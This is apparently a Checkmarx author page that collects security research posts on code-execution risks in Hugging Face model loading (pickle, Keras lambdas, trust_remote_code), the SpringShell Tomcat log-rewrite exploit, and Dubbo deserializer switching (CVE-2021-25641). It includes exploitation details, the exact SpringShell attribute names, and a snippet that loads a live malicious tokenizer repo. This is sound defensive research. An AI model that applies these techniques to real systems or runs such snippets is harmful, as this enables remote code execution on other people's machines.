Dor Tumarkin, Author at Checkmarx

“Free Hugs” – What to be Wary of in Hugging Face – Part 2

Dor Tumarkin — Thu, 21 Nov 2024 12:00:48 +0000

Enjoy Threat Modeling? Try Threats in Models!

Previously…
In part 1 of this 4-part blog, we discussed Hugging Face and the potentially dangerous trust relationship between Hugging Face users and the ReadMe file, showed how users who trust the ReadMe can be exploited, and provided a glimpse into methods of attacking users via malicious models.
In part 2, we explore dangerous model protocols in more depth, going into the technical reasons why models run code at all.

Introduction to Model Serialization

A model is a program that was trained on vast datasets to either recognize or generate content based on statistical conclusions derived from those datasets.
To oversimplify, they’re just data results of statistics. However, do not be misled – models are code, not plain data. This is often stressed in everything ML, particularly in the context of security. Without going into too much detail – it is inherent for many models to require logic and functionality which is custom or specific, rather than just statistical data.
Historically (and unfortunately) that requirement for writable and transmittable logic encouraged ML developers to use complex object serialization as a means of model storage – in this case types of serialization which could pack code. The quickest solution to this problem is the notoriously dangerous pickle, used by PyTorch to store entire Torch objects, or its more contextual and less volatile cousin marshal, used by TensorFlow’s lambda layer to store lambda code.

Please stop using this protocol for things. Please.

While simple serialization involves data (numbers, strings, bytes, structs), more complex serialization can contain objects, functions and even code – and that significantly raises the risk of something malicious lurking inside the models.

Writing’s on the wall there, guys

Protecting these dangerous deserializers while still using them is quite a task. For now, let’s focus on exploitation. This is quite well documented at this point, though there have been some curious downgrades exposed during this research.

Exploiting PyTorch

PyTorch is a popular machine learning library – extremely popular on Hugging Face and the backbone of many ML frameworks supported on HF. We’ll have more on those (and how to exploit them) in a future blog.
PyTorch relies on pickling to save its output. A pickle can contain an arbitrary callable with arbitrary arguments, which is invoked upon deserialization by the load function; this works the same for PyTorch:

If this looks identical to the previous Pickle example to you then that’s because it is.

Note that the source code for BadTorch doesn’t need to be in scope – the value of __reduce__ is packed into the pickle, and its contents will execute on any pickle.load action.
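
As a rough illustration of the mechanism (a stdlib-only sketch, not the exploit from the screenshot), the snippet below pickles an object whose __reduce__ returns a harmless print call. The body of BadTorch and the message are assumptions made for this demo; a real payload would swap print for something far less friendly.

```python
import pickle


class BadTorch:
    """Demo class: __reduce__ tells pickle what to call when loading."""

    def __reduce__(self):
        # (callable, args): pickle stores a reference to the callable and its
        # arguments, and invokes callable(*args) at load time.
        return (print, ("code ran during unpickling",))


blob = pickle.dumps(BadTorch())

# The class definition is no longer needed: the pickle only references
# builtins.print and the argument tuple.
del BadTorch

# Loading triggers the call; the "object" we get back is print's return value.
result = pickle.loads(blob)
```

Note that the loaded value is simply whatever the callable returned, so nothing about the file needs to resemble a model for the call to fire.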
To combat this, PyTorch added a weights_only flag. This flag treats anything outside of a very small allowlist as malicious and rejects it, severely limiting if not blocking exploitation. It is used internally by Hugging Face’s transformers, which explains why transformers can safely load torches even when they are dangerous. Starting with version 2.4, PyTorch encourages this flag via a warning stating that it will become the default behavior in the future.
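
The allowlist idea can be sketched with the standard library alone. This is not PyTorch's implementation of weights_only, just the "restricting globals" pattern from the Python pickle documentation; the ALLOWED set, AllowlistUnpickler, restricted_loads and Payload are names invented for this example.

```python
import io
import pickle

# Hypothetical allowlist: only these globals may be resolved during loading.
ALLOWED = {("builtins", "list"), ("builtins", "dict"), ("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks for a global (class or function).
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data):
    return AllowlistUnpickler(io.BytesIO(data)).load()


class Payload:
    def __reduce__(self):
        return (print, ("this should never run",))


safe_blob = pickle.dumps({"weights": [0.1, 0.2]})
evil_blob = pickle.dumps(Payload())

loaded = restricted_loads(safe_blob)  # plain data needs no globals at all

try:
    restricted_loads(evil_blob)
    blocked = False
except pickle.UnpicklingError:
    blocked = True  # builtins.print is not on the allowlist
```

The point of the design is that the decision is made before anything is called: the loader refuses to even resolve a name it does not recognize.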

At the time of writing, PyTorch does not yet enable weights_only mode by default. Seeing how rampant the use of torch.load is in various technologies (this will be discussed in part 3), it would be safer to believe this change when we see it, because it is likely to be a breaking change. It would then be up to the maintainers whose code it breaks to either adapt or disable this security feature.

TensorFlow to Code Execution

TensorFlow is a different machine learning library that offers various ways to serialize objects as well.
Of particular interest to us are serialized TensorFlow objects in protocols that may contain serialized lambda code. Since lambdas are code, they get executed after being unmarshaled by Keras, a high-level interface library for TensorFlow.
Newer versions of TensorFlow do not generate files in the older Keras formats (TF1, which uses several protobuf files, or h5).
To observe this, we can look at the older TensorFlow 2.15.0, which allows generating a model that runs malicious code when loaded (credit to Splinter0 for this particular exploit):

Note that the functionality to serialize lambdas has been removed in later versions of the protocol. Keras, which supports Lambdas, now relies on annotations to link lambdas to your own code, removing arbitrary code from the process.
This could have been a great change if it eliminated support for the old dangerous formats, but it does not – it only removes serialization (which creates the payload) but not execution after deserialization (which consumes it).
Simply put – just see for yourself: if you generate a payload like the above model in an h5 format using the dangerous tensorflow 2.15.0, and then update your tensorflow:

Exploit created on tensorflow 2.15.0, exploit pops like a champ on 2.18.0

In other words – this is still exploitable. It’s not really a Keras vulnerability, though (in the same vein that torch.load “isn’t vulnerable”); rather, it’s a matter of how you end up using it. We disclosed it, amongst several other things, to Hugging Face in August 2024, but more on that in a later write-up.
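
To make the lambda mechanism from this section a bit more concrete, here is a stdlib-only sketch of how a lambda's code object can travel through marshal and come back as a callable. It is not Keras's actual serialization code and not the exploit shown above; the double lambda is a harmless stand-in.

```python
import marshal
import types

# A harmless lambda standing in for whatever a Lambda layer would wrap.
double = lambda x: x * 2

# Serialize only the compiled code object (bytecode, constants, names).
blob = marshal.dumps(double.__code__)

# On the loading side: rebuild a function from the bytes and call it.
# Whoever controls the bytes controls what this function does.
code = marshal.loads(blob)
rebuilt = types.FunctionType(code, {})
result = rebuilt(21)
```

Marshal data is tied to the Python version that produced it, which is one reason the article calls it "more contextual" than pickle; it does not make the loaded code any more trustworthy.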

SafeTensors

Currently, Hugging Face is transitioning models from the pickle format to SafeTensors, which uses a more secure deserialization protocol that is not as naïve (but not as robust) as pickle.

SafeTensors simply use a completely different language (Rust) and a much simpler serialization protocol (Serde), which requires customization for any sort of automatic behavior post-deserialization.
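
To show why such a format leaves little room for code, here is a toy reader and writer, assuming the layout described in the safetensors README: an 8-byte little-endian header length, a JSON header, then raw tensor bytes. The pack and unpack helpers are invented for this sketch, handle only flat F32 tensors, and are no substitute for the real library.

```python
import json
import struct


def pack(tensors):
    """Serialize {name: [floats]} into a safetensors-like byte string."""
    header, payload = {}, b""
    for name, values in tensors.items():
        raw = struct.pack(f"<{len(values)}f", *values)
        header[name] = {
            "dtype": "F32",
            "shape": [len(values)],
            "data_offsets": [len(payload), len(payload) + len(raw)],
        }
        payload += raw
    header_bytes = json.dumps(header).encode("utf-8")
    return struct.pack("<Q", len(header_bytes)) + header_bytes + payload


def unpack(blob):
    """Parse the byte string back; nothing here can name a callable."""
    (header_len,) = struct.unpack_from("<Q", blob, 0)
    header = json.loads(blob[8:8 + header_len])
    data = blob[8 + header_len:]
    out = {}
    for name, meta in header.items():
        if name == "__metadata__":  # optional free-form string metadata
            continue
        start, end = meta["data_offsets"]
        count = (end - start) // 4  # F32 is 4 bytes per element
        out[name] = list(struct.unpack(f"<{count}f", data[start:end]))
    return out


blob = pack({"bias": [0.5, -1.0, 2.0]})
tensors = unpack(blob)
```

Everything the loader reads is either JSON text or a numeric buffer, so there is no equivalent of __reduce__ for an attacker to hook.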

Moving from Torch to SafeTensors

However, there is a fly in the SafeTensors ointment – importing. It makes sense that the only way to import from another format is to open it using legacy libraries, but it’s also another vulnerable way to invoke Torches. convert.py is a part of the SafeTensors library intended to convert torches to the SafeTensors format; however, the conversion itself is simply a wrapper for torch.load:
https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py#L186
The HF Devs are aware of this and have added a prompt – but that can be bypassed with a -y flag:

Model will run whoami on conversion. Disclaimer: image manipulated to exclude a bunch of passive warnings that might warn you, right after it’s way too late

The problem here is the very low trust barrier to cross – since, as discussed, most configuration is derived from ReadMe commands. This flag can simply be hidden between other values in instructions, which makes convert.py not just a conversion tool but also another vector to look out for.

There are many more conversion scripts in the transformers library that still contain dangerous calls to torch.load; they can be found on the Transformers GitHub.

Conclusion

It’s interesting to see how what’s old is new again. Old serialization protocols, which are easier to implement and use, are making a comeback through new, complex technology – particularly where security was never a concern during experimentation – and are again becoming deeply ingrained in relatively new technology. The price for that speed is still being paid, with the entire ecosystem struggling to pivot to a secure and viable service by slogging through this tech debt.

There are several recommendations to be made when judging models by their format:

With serialization mechanisms baked into the ecosystem, you should avoid the legacy ones, and review those that are middle-of-the-way and historically vulnerable.
Consider a transition to SafeTensors or other protocols that are identified as secure and do not execute code or functions on deserialization, and reject older, potentially dangerous protocols.
- BUT never trust conversion tools to safely defuse suspicious models (without reviewing them first).
And – as always – make sure you trust the maintainer of the Model.

On The Next Episode…

Now that we’ve discussed a couple of vulnerable protocols, we’ll demonstrate how they can be exploited in practice against Hugging Face integrated libraries.

“Free Hugs” – What To Be Wary of in Hugging Face – Part 1

Dor Tumarkin — Thu, 14 Nov 2024 12:00:00 +0000

Introduction

GenAI has taken the world by storm. To meet the need for open-source development of LLM/GenAI technology, various vendors have risen to help spread it.

One well-known platform is Hugging Face – an open-source platform that hosts GenAI models. It is not unlike GitHub in many ways – it’s used for serving content (such as models, datasets and code), version control, issue tracking, discussions and more. It also allows running GenAI-driven apps in online sandboxes. It’s very comprehensive and at this point a mature platform chock full of GenAI content, from text to media.

In this series of blog posts, we will explore the various potential risks present in the Hugging Face ecosystem.

Championing logo design Don’ts (sorry not sorry opinions my own)

Hugging Face Toolbox and Its Risks

Beyond hosting models and associated code, Hugging Face is also a maintainer of multiple libraries for interfacing with all this goodness – libraries for uploading models to the Hugging Face platform, and for downloading and executing models from it. From a security standpoint, this offers a HUGE attack surface to spread malicious content through. A lot has already been said about that vast attack surface, and many things have been tested in the Hugging Face ecosystem, but many legacy vulnerabilities persist, and bad security practices still reign supreme in code and documentation. These can bring an organization to its knees (while being practiced by major vendors!), and known issues are shrugged off because “that’s just the way it is” – while new solutions suffer from their own set of problems.

ReadMe.md? More Like “TrustMe.md”

The crux of all potentially dangerous behavior around marketplaces and repositories is trust – trusting the content’s host, trusting the content’s maintainer and trusting that no one is going to pwn either. This is also why environments that allow obscuring malicious code or ways to execute it are often more precarious for defenders.

While downloading things from Hugging Face is trivial, actually using them is finicky – there is no one global, definitive way to do so, and trying to do it any other way than the one recommended by the vendor will likely end in failure. Figuring out how to use a model always boils down to RTFM – the ReadMe.

But can ReadMe files be trusted? Like all code, there are good and bad practices – even major vendors fall for that. For example, Apple actively uses dangerous flags when instructing users on loading their models:

trust_remote_code sounds like a very reasonable flag to set to True

There are many ways to dangerously introduce code into the process, simply because users are bound to trust what the ReadMe presents to them. They can be led to load malicious code or malicious models in a manner that is both dangerous and very obscure.

Configuration-Based Code Execution Vectors

Let’s start by examining the above configuration in its natural habitat.

Transformers is one of the many tools Hugging Face provides users with, and its purpose is to normalize the process of loading models, tokenizers and more with the likes of AutoModel and AutoTokenizer. It wraps around many of the aforementioned technologies and mostly does a good job only utilizing secure calls and flags.

However – all of that security goes out the window once code execution is enabled for custom models that load as Python code. This sits behind a flag, “trust_remote_code=True”, which allows loading classes for models and tokenizers that require additional code and a custom implementation to run.

While it sounds like a terrible practice that should be rarely used, this flag is commonly set to True. Apple was already mentioned, so here’s a Microsoft example:

Why wouldn’t you trust remote code from Microsoft? What are they going to do, force install Windows 11 on y- uh oh it’s installing Windows 11

Using these configurations with an insecure model could lead to unfortunate results.

Code loads dangerous config → config loads code module → code loads OS command

Code will attempt to load an AutoModel from a config with the trust_remote_code flag

Config will then attempt to load a custom class model from “exploit.SomeTokenizer” which will import “exploit” first, and then look for “SomeTokenizer” in that module

The SomeTokenizer class doesn’t exist, but exploit.py has already been loaded and is executing malicious commands
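
The import-then-lookup order in the steps above is ordinary Python behavior and can be reproduced without any Hugging Face code. In this sketch the resolve helper, the exploit_demo module name and its contents are all made up for the demonstration, and the "malicious command" is just a print.

```python
import importlib
import sys
import tempfile
from pathlib import Path


def resolve(dotted_path):
    """Resolve 'module.ClassName' the naive way: import first, look up second."""
    module_name, class_name = dotted_path.rsplit(".", 1)
    module = importlib.import_module(module_name)  # module body runs here
    return getattr(module, class_name)  # may fail, but it's already too late


with tempfile.TemporaryDirectory() as repo:
    # Stand-in for a downloaded repo containing a module with top-level code.
    Path(repo, "exploit_demo.py").write_text(
        "RAN = True\nprint('module body executed on import')\n"
    )
    sys.path.insert(0, repo)
    importlib.invalidate_caches()
    try:
        try:
            resolve("exploit_demo.SomeTokenizer")
            lookup_failed = False
        except AttributeError:
            lookup_failed = True  # the class never existed
        side_effect_ran = sys.modules["exploit_demo"].RAN
    finally:
        sys.path.remove(repo)
```

The lookup fails loudly, yet the module's top-level code has already run; an error message at that point is no evidence that nothing happened.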

This works for auto-models and auto-tokenizers, and in transformer pipelines:

in this case the model is valid, but the tokenizer is evil. Even easier to hide behind!

Essentially this paves the way to malicious configurations – ones that seem secure but aren’t. There are plenty of ways to hide a True flag looking like a False flag in plain sight:

False is False

{False} is True – it’s a non-empty set

“False” is True – it’s a str

False < 1 – is True, just squeeze it to the side:

This flag is set as trust_remote_code=False……………………………………………………………………………….………….n’t

While these are general parlor tricks to hide True statements that are absolutely not exclusive to any of the code we’ve discussed – hiding a dangerous flag in plain sight is still rather simple. However, the terrible practice by major vendors to have this flag be popular and expected means such trickery might not even be required – it can just be set to True.
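
The parlor tricks listed above are easy to verify in an interpreter. The snippet only demonstrates Python truthiness; whether a particular library checks the flag with a strict comparison or with plain truthiness is something to confirm per library, and is not claimed here.

```python
# Each label is the expression as it might appear in a ReadMe snippet.
candidates = {
    "False": False,
    "{False}": {False},        # a set literal with one element
    '"False"': "False",        # a non-empty string
    "False < 1": False < 1,    # a comparison, hidden off to the side
}

truthy = {label: bool(value) for label, value in candidates.items()}

for label, outcome in truthy.items():
    print(f"{label:>10} -> {outcome}")
```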

Of course, this entire thing can be hosted on Hugging Face – models are uploaded to repos in profiles. Providing the name of the profile and repo will automatically download and unpack the model, only to load arbitrary code.

import transformers

# Warning: trust_remote_code=True downloads and executes Python code from this repo
yit = transformers.AutoTokenizer.from_pretrained("dortucx/unkindtokenizer", trust_remote_code=True)

print(yit)

Go on, try it. You know you want to. What’s the worst that can happen? Probably nothing. Right? Nothing whatsoever.

Dangerous Coding Practices in ReadMes

Copy-pasting from ReadMes isn’t just dangerous because they contain configurations in their code, though – ReadMes contain actual code snippets (or whole scripts) to download and run models.

We will discuss many examples of malicious model loading code in subsequent write-ups but to illustrate the point let’s examine the huggingface_hub library, a Hugging Face client. The hub has various methods for loading models automatically from the online hub, such as “huggingface_hub.from_pretrained_keras”. Google uses it in some of its models:

And if it’s good enough for Google, it’s good enough for everybody!

But this exact method also supports dangerous legacy protocols that can execute arbitrary code. For example, here’s a model that is loaded using the exact same method using the huggingface_hub client and running a whoami command:

A TensorFlow model executing a “whoami” command, as one expects!

Conclusions

The Hugging Face ecosystem, like all marketplaces and open-source providers, suffers from issues of trust and, like many of its peers, has a variety of blind spots, weaknesses and practices that empower attackers to easily obscure malicious activity.

There are plenty of things to be aware of – for example if you see the trust_remote_code flag being set to True – tread carefully. Validate the code referenced by the auto configuration.

Another always-true recommendation is to simply avoid untrusted vendors and models. A model configured incorrectly by a trusted vendor is only trustworthy until that vendor’s account is compromised, but any model from any untrusted vendor is always highly suspect.

As a broader but more thorough methodology, however, a user who wants to securely rely on Hugging Face as a provider should be aware of many things – hidden evals, unsafe model loading frameworks, hidden importers, fishy configuration and many, many more. It’s why one should read the rest of these write-ups on the matter.

On The Next Episode…

Now that we’ve discussed the very basics of setting up a model – we’ve got exploit deep-dives, we’ve got scanner bypasses, and we’ve also got more exploits. Stay tuned.

SpringShell – Remote Code Execution via Spring Web

Dor Tumarkin — Thu, 31 Mar 2022 12:04:03 +0000

SpringShell is a new vulnerability in Spring, the world’s most popular Java framework, which enables remote code execution (RCE) using ClassLoader access to manipulate attributes and setters. This issue was unfortunately leaked online without responsible disclosure before an official patch was available. This vulnerability has been assigned CVE-2022-22965.

At present, known exploitation of this vulnerability requires a combination of Spring, Java version 9 and up, and Tomcat; however, this is likely to change, due to the fact this exposure occurs in Spring and allows access to various sensitive components. It is therefore safest to assume all Spring Web instances are likely to be vulnerable.

Note that currently there is another critical RCE vulnerability making headlines around Spring Cloud, which involves a similar exploitation technique of accessing functions. This article does not cover that issue.

Technology Breakdown

The current focus at large is on the known exploitation of Spring, Java version 9 and up, and Tomcat.

Spring allows rapid and lightweight development for Java applications, particularly for web applications. Tomcat is a very popular webserver for Java applications, and is also embedded into Spring Boot. This means the combination of Spring and Tomcat is almost ubiquitous, making this vulnerability extremely common. Java 9 has been around for 5 years and is also a requirement for this issue.

Another requirement for the specific exploit is accepting POST requests with POJOs to trigger binding; there are very few Spring web-applications that do not.

Am I Vulnerable?

If you are using Spring Web which is exposed to the internet running on Java 9 and later – you are most likely exposed to this vulnerability. Current exploits available in the wild require a combination of Spring and Tomcat, but Tomcat is merely an instrument in a gadget used to trigger this RCE; more gadgets may be found as exposed by this vulnerability.

How Does It Work?

The best way to explain how this vulnerability is exploitable is by breaking down the available exploit. However – note that while this exploit affects a particular configuration of Spring, Tomcat, and Java – not having this particular configuration does not imply you are safe from exploitation, only from this particular variant.

The current RCE PoC exploit involves the following steps:

Finding a POST endpoint in the Spring application
Submitting a request to reconfigure Tomcat to output a log to an arbitrary JSP file in an accessible location which serves JSP files on the Tomcat server
Triggering a write to this log of user-provided values, to create a JSP file with malicious code
Executing the JSP file by requesting it via HTTP, as per standard JSP behavior

Let’s break it down.

ClassLoader Manipulation

It is possible to access ClassLoader variables via POST parameters prefixed by class.module.classLoader.* in Spring, due to parameter binding. Years ago, Spring allowed access to ClassLoader directly in this manner, which led to other exploits (e.g., CVE-2010-1622). As mitigation, a deny-list for specific parameters was then added. However, Java 9 added Modules, which allow reaching ClassLoader via class.getModule().getClassLoader(); this is precisely why the deny-list approach to blocking ClassLoader access could be bypassed with class.module.classLoader.

This manipulation exposes internal objects to user-provided values, and is the core of this vulnerability.
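
The deny-list bypass can be modeled with a toy property binder. This is a Python analogy, not Spring's code: the classes, the DENIED set and the resolve function are all invented here, and the only thing carried over from the text is the shape of the problem, namely that a rule written for one path does not cover a new path to the same object.

```python
class ClassLoader:
    def __init__(self):
        self.resources = "server internals"


class Module:
    def __init__(self, loader):
        self.classLoader = loader


class Class:
    def __init__(self):
        loader = ClassLoader()
        self.classLoader = loader          # the old, known-dangerous path
        self.module = Module(loader)       # the path that appeared later


class Pojo:
    def __init__(self):
        self.name = "demo"
        setattr(self, "class", Class())    # 'class' is a Python keyword


# Toy deny-list: block specific properties, but only on Class itself.
DENIED = {(Class, "classLoader"), (Class, "protectionDomain")}


def resolve(root, path):
    """Walk a dotted parameter name the way a naive binder would."""
    current = root
    for part in path.split("."):
        if (type(current), part) in DENIED:
            raise PermissionError(f"denied property: {part}")
        current = getattr(current, part)
    return current


try:
    resolve(Pojo(), "class.classLoader")
    direct_blocked = False
except PermissionError:
    direct_blocked = True

reached = resolve(Pojo(), "class.module.classLoader")
```

An allow-list of bindable properties would have rejected both paths, since neither would have been explicitly permitted.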

Tomcat Context Reconfiguration

Using this ClassLoader manipulation on a Tomcat web server, it is possible for attackers to directly access the Tomcat context, which in itself contains Tomcat configurations.

In this exploit, Tomcat is reconfigured to write logs to a new file at an attacker’s behest. This file, instead of just being a log file, will also double as an executable JSP file.

The following attributes are edited to write the arbitrary log file:

class.module.classLoader.resources.context.parent.pipeline.first.directory — the path to which the log file is written. In standard Tomcat dev environments, webapps/ROOT will expose a root folder for the webserver itself; however, in more custom prod environments an attacker may need to figure out where exactly malicious JSP files can be written to be remotely accessible
class.module.classLoader.resources.context.parent.pipeline.first.prefix — will determine the log file name
class.module.classLoader.resources.context.parent.pipeline.first.suffix — will determine the log file extension — for the purpose of exploitation this will be an executable servlet type such as JSP, but attackers can come up with various other potentially executable file types
class.module.classLoader.resources.context.parent.pipeline.first.pattern — this is the pattern that will be written to the log file; attackers will write malicious code instead of a pattern, such that on a logging event their malicious code will be written into the file
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat — this is the date format, which is purposefully left blank to remove the noisy timestamps from the output of the exploit
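
For defenders writing detections, it can help to see how the five attributes above look as a form-encoded request body. The sketch below only builds and decodes a string; it sends nothing, and the pattern value is a deliberately inert placeholder. The directory and file name come from the text, while the variable names are assumptions of this example.

```python
from urllib.parse import parse_qs, urlencode

# Common prefix shared by all five attributes listed above.
PREFIX = "class.module.classLoader.resources.context.parent.pipeline.first."

log_settings = {
    "directory": "webapps/ROOT",           # where the "log" would be written
    "prefix": "ohno",                      # file name
    "suffix": ".jsp",                      # file extension
    "pattern": "PLACEHOLDER-LOG-PATTERN",  # inert stand-in, not code
    "fileDateFormat": "",                  # blank to avoid timestamps
}

# Form-encode the parameters as they would appear in a POST body.
form_body = urlencode({PREFIX + key: value for key, value in log_settings.items()})

# Decoding it back shows what a WAF rule or log search could key on.
decoded = parse_qs(form_body, keep_blank_values=True)
suspicious_keys = [key for key in decoded if key.startswith("class.module.classLoader")]
```

Any request parameter beginning with class.module.classLoader is a strong signal on its own, regardless of the values that follow.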

Arbitrary File Write of a Malicious JSP File

For example, the following POST request can be sent:

This will override the log configuration to create a JSP servlet at Tomcat’s web application root (“/”), allowing attackers to execute the malicious code in “pattern” by simply browsing to /ohno.jsp.

Mitigation & Conclusions

According to an update on the official Spring website, this issue is mitigated in Spring Framework versions 5.3.18 and 5.2.20. This article also contains a vendor-recommended workaround for those who cannot update at present.

From the looks of things and how analysis of this issue currently pans out — this vulnerability illustrates how the changes made to Java have incidentally made the Spring deny-list obsolete, in a way that has evaded detection for a significant amount of time. This highlights the ever-present issue of denying dangerous functionalities, rather than explicitly allowing safe ones, which is a behavior often prevalent in frameworks that offer a lot of dynamic and complex features.

Checkmarx SCA customers can scan their code for similar types of vulnerabilities and get the latest remediation guidance.

The 0xDABB of Doom: CVE-2021-25641

Dor Tumarkin — Fri, 04 Jun 2021 14:01:09 +0000

Introduction

When I previously wrote the original Dubbo publication, we disclosed that issue as it was mitigated by the vendor. While the Dubbo “HTTP” protocol in that disclosure was trivially vulnerable to the most common Java deserialization attacks (as evidenced by the immediate cropping up of exploits for Dubbo as soon as a very broad description of the issue was published in a mailing list) – the so-called “HTTP” was an elective protocol, and honestly – there was no apparent reason to choose it over the default Dubbo protocol. This made it an unlikely misconfiguration, and most devs would probably just stick to the default Dubbo protocol; this made it very tempting to investigate Dubbo further.
The “Dubbo” protocol is a proprietary binary protocol which required some reverse-engineering of its inner logic and how it is being consumed by the endpoint. It actually wraps around the binary of the serialized object, adding meta-data and additional objects to the stream. The underlying deserializer defaults to Hessian2, configured to exclude many of the “known dangerous” classes often used to exploit such attacks. However, there were some ways to manipulate this protocol, such as electing the deserializer, which would then lead to RCE.

Vulnerability Overview

The Dubbo protocol is a proprietary protocol developed for Apache Dubbo for transmission of objects between Dubbo services. Apache Dubbo providers and consumers using certain versions of Dubbo, when configured to accept the default “Dubbo” protocol, allow a remote attacker to send a malformed stream containing a malicious object to the exposed service, which results in Remote Code Execution.

This RCE occurs with no authentication, and no knowledge on an attacker’s part is required to exploit this vulnerability – only an open port on a Provider server running Apache Dubbo. This issue applies to default configuration, where the built-in Dubbo protocol is used.

Severity

Checkmarx considers this vulnerability to have a CVSS score of 10.0 (Critical), as it is an unauthenticated remote code execution vulnerability which provides privileges at the Dubbo service’s permission level, allowing complete compromise of that service’s confidentiality, integrity, and availability.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
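
For readers who want to check the arithmetic, the vector above can be run through the base score equations from the CVSS v3.0 specification. This is a small sketch rather than a full calculator: it covers base metrics only, the helper names are made up, and the simple roundup helper ignores the floating-point corner cases that later spec revisions address.

```python
import math

# Metric weights from the CVSS v3.0 base score specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value):
    """Round up to one decimal place."""
    return math.ceil(value * 10) / 10


def base_score(vector):
    # Skip the "CVSS:3.0" prefix and split the rest into metric:value pairs.
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    changed = metrics["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]

    iss = 1 - (1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = 8.22 * AV[metrics["AV"]] * AC[metrics["AC"]] * pr * UI[metrics["UI"]]

    if impact <= 0:
        return 0.0
    total = impact + exploitability
    return roundup(min(1.08 * total if changed else total, 10))


score = base_score("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H")
```

With every metric at its worst value and a changed scope, the raw sum exceeds the cap, so the score is clamped to 10.0.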

What’s Going On – Understanding the Dubbo Protocol

The server-side “Dubbo” protocol on a provider is used to expose a service, and methods within this service, to external consumers.
The “Dubbo” protocol has two general modes served over the same port:

Telnet-like mode, where a CLI is available to allow invoking a method exposed by the provider service
An RMI mode, where the TCP packet is then treated as a byte stream, which is deserialized to be used with the service offered by the Dubbo provider

Fig. 1 – Dubbo Telnet

While default behavior is Telnet-like, the way the remoting protocol is invoked is by providing a header which is built in the following manner:

Two magic bytes – 0xdabb
A flag byte – this flag determines:
1. If this stream is a request or a response
2. If this transaction is one-way or two-way
3. Deserialization mechanism identifier (Hessian2, Kryo, Java etc.)
Padding null-bytes, to allow for dynamic length
Length of stream

This method is reminiscent of port-knocking, but instead of sending a stream of bytes to open a port, two preamble bytes are used to switch between protocols (Telnet-like mode and RMI-like mode).
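
The header described above can be sketched with struct. The layout used here is an assumption based on the publicly documented 16-byte Dubbo header, in which the bytes this article treats as padding are a status byte and an 8-byte request id; the flag bit values and the helper names are likewise assumptions to verify against the Dubbo source, not details taken from this write-up.

```python
import struct

MAGIC = 0xDABB             # the two magic bytes
FLAG_REQUEST = 0x80        # assumed: set for requests, clear for responses
FLAG_TWO_WAY = 0x40        # assumed: set when a response is expected
SERIALIZATION_MASK = 0x1F  # assumed: low 5 bits select the (de)serializer

# Big-endian: magic (2), flag (1), status (1), request id (8), body length (4).
HEADER_FORMAT = ">HBBQI"


def build_header(serialization_id, body_length, request_id=0, two_way=True):
    flag = FLAG_REQUEST | (serialization_id & SERIALIZATION_MASK)
    if two_way:
        flag |= FLAG_TWO_WAY
    return struct.pack(HEADER_FORMAT, MAGIC, flag, 0, request_id, body_length)


def parse_header(header):
    magic, flag, status, request_id, body_length = struct.unpack(HEADER_FORMAT, header)
    return {
        "magic_ok": magic == MAGIC,
        "is_request": bool(flag & FLAG_REQUEST),
        "two_way": bool(flag & FLAG_TWO_WAY),
        "serialization_id": flag & SERIALIZATION_MASK,
        "body_length": body_length,
    }


# 2 is used here as the id commonly associated with Hessian2 (an assumption).
header = build_header(serialization_id=2, body_length=128)
parsed = parse_header(header)
```

The takeaway for defenders is that the deserializer choice lives in a client-controlled byte, so a parser like this is also a convenient place to log or reject unexpected serialization ids.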
The preamble header is then followed by a stream sequence containing the following data:

1. Dubbo Protocol version
2. Service name (“Path”)
3. Service version
4. Method name
5. Method argument types
6. Method arguments
7. Request attachments, which may contain additional data

All of the above data is read as a UTF string, with the exception of item 6 (method arguments); this is because a method argument may contain any Java object which may be passed to the Dubbo Provider, while the other data is provided as Strings, to be used with reflection inside the code.
The open Dubbo port can be trivially fingerprinted as such by readily available tools, such as Nmap.

Fig. 2 – Dubbo telnetd Service, As It Appears on Nmap

The raw TCP request, including preamble and metadata, sends a request and receives a response over the same TCP stream, as demonstrated via Dubbo’s Quick Start sayHello demo:

Fig. 3 – Dubbo Protocol Request in Its Default Serialized Form

Fig. 4 – Dubbo Protocol Response in Dubbo Demo

Fig. 5 – Dubbo Protocol Breakdown

Attacking the Dubbo Protocol

The most commonly known Java-based gadget chains used for exploiting deserialization attacks rely on several key classes – these classes appear to be blacklisted on the default Hessian2 serializer.
The Dubbo protocol relies on the flag byte (3rd byte of the stream) to determine which serializer/deserializer to use when processing this stream. While the default is Hessian2, an attacker may tamper with this flag to choose a different deserializer, exposing multiple additional options for serialization. These additional deserializers do not offer the same protection Hessian2 does.
An attacker can modify the flag to choose either of the following protocols:

Kryo
FST

Both of these protocols are binary serialization protocols, and successfully deserialize the FastJSON gadget-chain.

Fig. 6 – The Majestic, Feral Beauty of a Kryo-Serialized FastJSON Gadget ByteStream

For the purpose of having the gadget chain deserialized, however, a compliant stream should be created containing the required preamble, headers, and metadata.
Since the exploit does not actually require Dubbo to successfully dispatch the request (in versions <= 2.7.5), but rather simply successfully read, parse and deserialize it, the stream itself can contain random or arbitrary strings. These strings are only there to serve as padding and satisfy multiple “readUTF” operations, until readObject is called on the stream, at which point FST or Kryo are the chosen deserializer and the exploit is triggered.

Recreating the Issue

An attacker can reimplement the Dubbo protocol with its byte preamble, header flags and content length, as well as dummy strings and a malicious object to satisfy the endpoint’s implementation for reading it.
The same gadget chain used in the previous exploit for the 2.7.3 HTTP protocol, which allows remote OS command execution, was found in the scope of vanilla Apache Dubbo, so long as dubbo-common is also in scope (more on this later).

Proof-of-Concept

Recreating a Victim Dubbo Instance for PoC

